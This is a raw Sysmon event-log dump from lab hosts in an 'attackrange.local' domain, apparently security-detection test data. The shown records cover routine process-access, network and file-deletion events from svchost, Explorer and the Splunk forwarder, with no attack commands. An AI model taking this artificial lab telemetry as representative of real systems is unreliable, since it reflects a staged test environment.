49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048202Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.580{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048201Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.580{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048200Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.580{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048199Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.580{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048198Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.580{466BC892-32D3-60E8-770B-00000000CF01}63567856C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048197Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.580{466BC892-32D3-60E8-770B-00000000CF01}63567856C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001048196Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:17.725{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51012-false10.0.1.12-8000- 23542300x80000000000000001048195Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.096{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D8C71D55304FAA4EE9C633A61748205,SHA256=485D6CE2FCAAF382184566F15AD1EC45D71B62127366B6158D4202FDD13B6576,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048243Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:26.397{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001048242Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:26.397{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001048241Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:26.397{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048240Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:26.397{466BC892-32D3-60E8-770B-00000000CF01}63567856C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048239Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:26.397{466BC892-32D3-60E8-770B-00000000CF01}63567856C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048238Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:26.397{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048237Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:26.111{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=779302C0F1108ED18DEBEA01B6664A76,SHA256=AB0E475099CE65E9C55AE06DCAEA90DDE124FD18BCBB12E8E6B2B57D233095EB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807417Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:25.229{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57253-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807416Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:26.643{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8E00B404D86AA56F511649316B9BA5CB,SHA256=55121FFE55147D2FA324C96CE8C9090F571AC113613C68706794EC68815C07EA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807415Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:26.331{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F47E-60EB-6F79-00000000D001}1188C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807414Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:26.331{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807413Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:26.331{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807412Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:26.331{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807411Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:26.331{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807410Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:26.331{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807409Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:26.331{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807408Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:26.331{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807407Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:26.331{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807406Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 